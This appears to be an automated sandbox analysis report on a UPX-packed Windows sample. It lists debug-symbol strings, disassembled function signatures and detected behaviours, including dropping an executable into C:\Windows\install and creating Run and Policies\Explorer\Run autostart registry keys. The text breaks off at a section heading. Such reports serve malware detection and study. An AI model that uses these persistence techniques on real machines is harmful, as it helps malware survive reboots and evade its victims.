            Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbw source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb|r# source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbzr- source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: winmm.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: KiUserCallbackDispatcherRSDSwntdll.pdb source: WerFault.exe, 00000025.00000002.603618013.0000000000C12000.00000004.00000001.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbRr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdbO source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdbF source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001C.00000003.530725448.00000000031F7000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552560599.0000000000B94000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.564345998.0000000003273000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdbY source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wininet.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb`? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb.rQ source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdbU source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb; source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: msacm32.pdbF? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbLrs source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbC source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb^r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb@r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ws2_32.pdbx? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: explorer.pdb source: WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdbA source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdbL? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbm source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdbr? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: userenv.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdbpr7 source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdbfr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb*Rp source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552533833.0000000000B8E000.00000004.00000001.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdbP?}& source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdbS source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msasn1.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbM source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbi source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbJr} source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: twinapi.pdb source: WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: WINMMBASE.pdbY source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001C.00000003.530737964.00000000031FD000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552584359.0000000000B9A000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.566720629.0000000003279000.00000004.00000001.sdmp
            Source: Binary string: iphlpapi.pdb! source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb} source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wsock32.pdbw source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdbTr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdbS source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00455C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00455C10
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404846 push 00404874h; ret 1_2_0040486C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404848 push 00404874h; ret 1_2_0040486C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004048E4 push 00404910h; ret 1_2_00404908
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004050EC push 00405118h; ret 1_2_00405110
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040B080 push 0040B0ACh; ret 1_2_0040B0A4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0045288C push cs; retf 1_2_0045288D
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004058A8 push 004058D4h; ret 1_2_004058CC
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00409948 push 00409974h; ret 1_2_0040996C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00407100 push 0040712Ch; ret 1_2_00407124
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00408918 push 00408954h; ret 1_2_0040894C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040891C push 00408954h; ret 1_2_0040894C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00407138 push 00407164h; ret 1_2_0040715C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004071C4 push 004071F0h; ret 1_2_004071E8
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040718C push 004071B8h; ret 1_2_004071B0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040898E push 004089BCh; ret 1_2_004089B4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00408990 push 004089BCh; ret 1_2_004089B4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00452A04 push ds; retf 1_2_00452A12
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040720A push 00407238h; ret 1_2_00407230
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040720C push 00407238h; ret 1_2_00407230
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404216 push 00404244h; ret 1_2_0040423C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404218 push 00404244h; ret 1_2_0040423C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040BAD0 push 0040BB00h; ret 1_2_0040BAF8
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00407AE8 push 00407B24h; ret 1_2_00407B1C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00407AEC push 00407B24h; ret 1_2_00407B1C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004032B8 push 004032F2h; ret 1_2_004032EA
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00406B10 push 00406B48h; ret 1_2_00406B40
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040345C push 00403494h; ret 1_2_0040348C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404C88 push 00404E05h; ret 1_2_00404DFD
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004034A0 push 004034CCh; ret 1_2_004034C4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004045CB push 004045F8h; ret 1_2_004045F0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004045CC push 004045F8h; ret 1_2_004045F0
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior:

            barindex
            Drops executables to the windows directory (C:\Windows) and starts themShow sources
            Source: C:\Windows\SysWOW64\explorer.exeExecutable created and started: C:\Windows\install\TEXTURAFIVEM.exeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeFile created: C:\Windows\install\TEXTURAFIVEM.exeJump to dropped file
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeFile created: C:\Windows\install\TEXTURAFIVEM.exeJump to dropped file
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,1_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,4_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,5_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,9_2_00409EF8

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior
            Creates an undocumented autostart registry key Show sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run PoliciesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403C858 OpenSCManagerA,OpenServiceA,StartServiceA,ControlService,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,20_2_2403C858
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
